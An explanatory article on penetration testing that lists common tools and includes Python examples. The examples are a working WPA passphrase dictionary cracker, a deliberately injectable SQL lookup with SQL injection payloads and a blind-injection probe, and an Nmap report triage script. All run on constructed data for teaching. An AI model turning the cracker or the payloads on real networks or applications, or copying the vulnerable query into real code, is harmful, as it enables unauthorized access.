What is pen testing?

Penetration testing (pen testing) is an authorized, simulated attack carried out by ethical hackers to determine whether a system can be compromised: which of its defenses held, and which ones the test was able to get past. Most professionals rely on a standard set of tools to do the job; the most common ones are listed below.

How is a pen test done?

Step-by-step:

1. Build a list of potential issues and vulnerabilities that could lead to a breach of the particular system, ideally sorted by priority with the most critical first.

2. Draw up a test plan covering both the internal network and the external perimeter, with the goal of checking whether the network, data, or servers can be accessed without authorization.

3. Execute the plan. Wherever unauthorized access was possible, fix the affected system, then re-run the same tests to confirm that the issues are actually resolved and that the fix introduced nothing new.

The tools below are the ones used day to day. Some of them require a license; most are free.

Nmap

OWASP ZAP

Wifiphisher

Burp Suite

Aircrack-ng

CME (CrackMapExec)

SQLmap

PowerSploit

Impacket

BeEF (Browser Exploitation Framework)

THC-Hydra

Social Engineer Toolkit (SET)

Luckystrike

Metasploit

Network Mapper (Nmap) was first released in 1997 and is a security scanner whose capabilities range from host discovery and port scanning to service and OS detection and decoy/spoofed scanning. The Nmap Scripting Engine (NSE) extends it with Lua scripts for more sophisticated service detection, vulnerability checks, and more.
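The first two steps of the procedure above (build the list of findings, sort it by priority) and the retest in the last step usually start from Nmap output. The block below is an added example written for this article, not Nmap code: it parses a report in Nmap's -oX XML format, scores each host with the example's own triage heuristic, and compares a before/after pair of scans to show which flagged ports survived a fix. The report, the script id and its output are constructed placeholders, not a real scan or a real vulnerability.

```python
"""Triage an Nmap XML report into a prioritized finding list.

Added example for this article, not part of Nmap or any project it mentions.
The scoring rule is this example's own heuristic; the report below is a
constructed sample in Nmap's -oX format, not output from a real scan.
"""
import xml.etree.ElementTree as ET

# Constructed sample report (three hosts on a /29); the script id and its output
# are placeholders, not a real NSE script or a real vulnerability.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script vuln -oX scan.xml 10.0.0.0/29">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/>
        <script id="example-vuln-check" output="VULNERABLE: constructed finding"/></port>
      <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.0.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="22"><state state="filtered"/><service name="ssh"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.0.0.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
    </ports></host>
</nmaprun>
"""

# Service names as Nmap reports them; the weights are the example's own triage choice.
LEGACY_CLEARTEXT = {"ftp", "telnet", "vnc", "rlogin", "rsh"}
ADMIN_OR_DATA = {"microsoft-ds", "netbios-ssn", "ms-wbt-server", "ms-sql-s",
                 "mysql", "postgresql", "oracle", "mongodb", "redis"}


def parse_open_ports(xml_text):
    """Return {ip: [(port, proto, service, [script outputs]), ...]} for open ports only."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        entries = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not exposure
            service = port.find("service")
            name = service.get("name", "unknown") if service is not None else "unknown"
            scripts = [s.get("output", "") for s in port.findall("script")]
            entries.append((int(port.get("portid")), port.get("protocol"), name, scripts))
        hosts[addr.get("addr")] = entries
    return hosts


def score_host(entries):
    """Score one host; higher means fix first. Returns (score, reasons)."""
    score, reasons = 0, []
    for port, proto, name, scripts in entries:
        if any("VULNERABLE" in out for out in scripts):
            score += 10
            reasons.append(f"{port}/{proto} {name}: NSE reports VULNERABLE")
        if name in LEGACY_CLEARTEXT:
            score += 5
            reasons.append(f"{port}/{proto} {name}: legacy/cleartext service")
        elif name in ADMIN_OR_DATA:
            score += 3
            reasons.append(f"{port}/{proto} {name}: admin or data service exposed")
        else:
            score += 1  # any open port is attack surface
    return score, reasons


def prioritize(xml_text):
    """Rank hosts most-critical first: [(ip, score, reasons), ...]."""
    ranked = [(ip, *score_host(e)) for ip, e in parse_open_ports(xml_text).items()]
    ranked.sort(key=lambda r: r[1], reverse=True)
    return ranked


def still_flagged(before_xml, after_xml):
    """Retest step: (ip, port) pairs that had a reason before the fix and still do after it."""
    def flagged(xml):
        return {(ip, r.split("/")[0]) for ip, _, reasons in prioritize(xml) for r in reasons}
    return flagged(before_xml) & flagged(after_xml)


if __name__ == "__main__":
    for ip, score, reasons in prioritize(SAMPLE_NMAP_XML):
        print(f"{ip:12} score={score:3}  " + "; ".join(reasons))
```

Feed it a real report with `nmap -sV --script vuln -oX scan.xml <targets>` and the ranking gives the order for the remediation plan; re-run the scan after the fixes and `still_flagged` lists what the fix missed. Only open ports count, because filtered and closed ports are not reachable exposure.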

The OWASP Zed Attack Proxy (ZAP) is an intercepting proxy that can automatically find security vulnerabilities in your web applications during development and testing. It is also used by experienced pentesters for manual security testing.

Wifiphisher is a rogue access point tool for Linux that automates phishing attacks against Wi-Fi clients: it lures victims onto an attacker-controlled network (for example by impersonating a legitimate access point) and then serves phishing pages to harvest credentials or deliver malware. Detailed documentation is available on the Wifiphisher website.

Burp Suite is a graphical, Java-based tool for testing web application security. The free Community edition is limited; the paid Professional edition adds a set of advanced features for web application security checks, such as the automated scanner.

Aircrack-ng is another well-known, day-to-day suite of tools for assessing Wi-Fi networks. It focuses on monitoring (packet capture and export of data to text files), attacking (replay attacks, deauthentication, fake access points and others via packet injection), testing (checking Wi-Fi cards and driver capabilities), and cracking (WEP and WPA PSK). Aircrack-ng is a fork of the original Aircrack project.
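The "cracking (WPA PSK)" step is a dictionary attack against a key derivation, and it helps to see why it is slow and why it is SSID-specific. The block below is an added example written for this article, not aircrack-ng code. It implements the IEEE 802.11 PSK derivation and verifies candidates against a PMKID rather than the full 4-way handshake MIC; the MAC addresses, the "captured" PMKID and the wordlist are constructed here so it runs offline.

```python
"""Dictionary attack on a WPA/WPA2 pre-shared key, the computation behind
aircrack-ng's "cracking (WPA PSK)" step.

Added example for this article, not aircrack-ng code. The PSK derivation is the
IEEE 802.11 one; the "captured" PMKID, MAC addresses and wordlist are constructed
here so the block runs offline.
"""
import hashlib
import hmac


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).

    The 4096 HMAC-SHA1 rounds per candidate are what make WPA cracking slow
    compared with a plain hash: the attacker pays that cost for every word, and
    because the SSID is the salt, a precomputed table only works for one SSID.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || station MAC): first 16 bytes.

    Many access points include this value in the first EAPOL frame of the 4-way
    handshake, so it can be checked without a client completing a handshake.
    """
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def crack_pmkid(ssid: str, ap_mac: bytes, sta_mac: bytes, captured: bytes, wordlist):
    """Return the first candidate whose derived PMKID matches the capture, or None."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:  # WPA passphrases are 8..63 characters
            continue
        derived = pmkid(wpa_psk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(derived, captured):
            return candidate
    return None


# Constructed capture: locally administered MACs and a PMKID derived from the
# IEEE 802.11 test-vector passphrase so the attack has something to hit.
SSID = "IEEE"
AP_MAC = bytes.fromhex("020000aabbcc")
STA_MAC = bytes.fromhex("020000112233")
CAPTURED_PMKID = pmkid(wpa_psk("password", SSID), AP_MAC, STA_MAC)
WORDLIST = ["pass", "letmein1", "Summer2024", "password", "correcthorse"]


if __name__ == "__main__":
    print("PSK for 'password'/'IEEE':", wpa_psk("password", "IEEE").hex())
    print("Recovered passphrase:", crack_pmkid(SSID, AP_MAC, STA_MAC, CAPTURED_PMKID, WORDLIST))
```

The passphrase/SSID pair "password"/"IEEE" is the published IEEE 802.11 test vector, so the derived PSK can be checked against the standard. Real tooling does the same loop with a captured handshake or PMKID; the per-candidate PBKDF2 cost is why long, random passphrases survive such attacks and short dictionary words do not.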

CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate the security assessment of large Active Directory networks. Built with stealth in mind, CME follows the "living off the land" approach: it abuses built-in Windows and Active Directory features and protocols (SMB, WinRM and the like) to achieve its functionality, which allows it to evade many endpoint protection and IDS/IPS solutions.

SQLmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many features for professional penetration testers, and a broad range of switches covering database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
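What "detecting SQL injection flaws" means in practice is easiest to see from one of the techniques SQLmap automates. The block below is an added example written for this article, not SQLmap code: a deliberately vulnerable lookup function, its parameterized twin, and a boolean-based blind probe of the kind SQLmap runs, using an in-memory SQLite table and payloads constructed for the example.

```python
"""Boolean-based blind SQL injection detection, the kind of check SQLmap
automates, run against a deliberately vulnerable function and its hardened twin.

Added example for this article, not SQLmap code. The in-memory SQLite table,
the two lookup functions and the probe payloads are constructed for the example.
"""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)",
                 [("alice", "alice@example.com"), ("bob", "bob@example.com")])


def lookup_vulnerable(name: str):
    """Deliberately vulnerable: attacker-controlled text is pasted into the SQL string."""
    return conn.execute(f"SELECT name, email FROM users WHERE name = '{name}'").fetchall()


def lookup_hardened(name: str):
    """Same query with a bound parameter: the input can never change the query's structure."""
    return conn.execute("SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def boolean_blind_probe(endpoint, known_value: str) -> bool:
    """Detect injection the way a boolean-based blind test does.

    Send the known value with an always-true and an always-false condition appended.
    If the true variant behaves like the baseline and the false variant does not,
    the condition reached the database's WHERE clause, i.e. the input is injectable.
    A raised database error is treated as just another distinguishable response.
    """
    def call(value):
        try:
            return endpoint(value)
        except sqlite3.Error as exc:
            return ("error", type(exc).__name__)

    baseline = call(known_value)
    when_true = call(known_value + "' AND '1'='1")
    when_false = call(known_value + "' AND '1'='2")
    return when_true == baseline and when_false != baseline


if __name__ == "__main__":
    tautology = "x' OR '1'='1"  # classic payload: dumps every row from the vulnerable function
    for fn in (lookup_vulnerable, lookup_hardened):
        print(f"{fn.__name__:18} injectable={boolean_blind_probe(fn, 'alice')}  "
              f"tautology returns {len(fn(tautology))} row(s)")
```

SQLmap runs this probe and several others (error-based, UNION, stacked, time-based) against every parameter of a request, and then uses the confirmed injection point for the fingerprinting and data-fetching switches described above. The hardened version fails the probe because the bound parameter is compared as data, never parsed as SQL.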

PowerSploit is a collection of Microsoft PowerShell modules and scripts that can be used in post-exploitation scenarios during authorized penetration tests.

Impacket is a collection of Python classes for working with network protocols. It focuses on providing low-level programmatic access to the packets and, for some protocols (e.g. SMB1-3 and MSRPC), the protocol implementation itself. Packets can be constructed from scratch as well as parsed from raw data, and the object-oriented API makes it simple to work with deep hierarchies of protocols. The library ships with a set of example scripts (such as the psexec, secretsdump and smbclient examples) that show what can be done with it.

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser: browsers that load its JavaScript hook are "hooked" and can then be driven with command modules from a central console.

When you need to brute-force a remote authentication service, Hydra is often the tool of choice. It can run rapid dictionary attacks against more than 50 protocols, including telnet, FTP, HTTP, HTTPS, SMB, several databases, and much more.

The Social-Engineer Toolkit (SET) was created and written by David Kennedy, the founder of TrustedSec. It is an open-source, Python-driven tool aimed at penetration testing around social engineering.

Luckystrike is a PowerShell-based utility for generating malicious Office macro documents, to be used for pentesting or educational purposes only.

Metasploit is a penetration testing platform that lets you find, exploit, and validate vulnerabilities. It provides the infrastructure, content, and tools to perform penetration tests and extensive security auditing; thanks to the open source community and Rapid7's own content team, new modules are added regularly, so exploits for newly published vulnerabilities often become available soon after disclosure.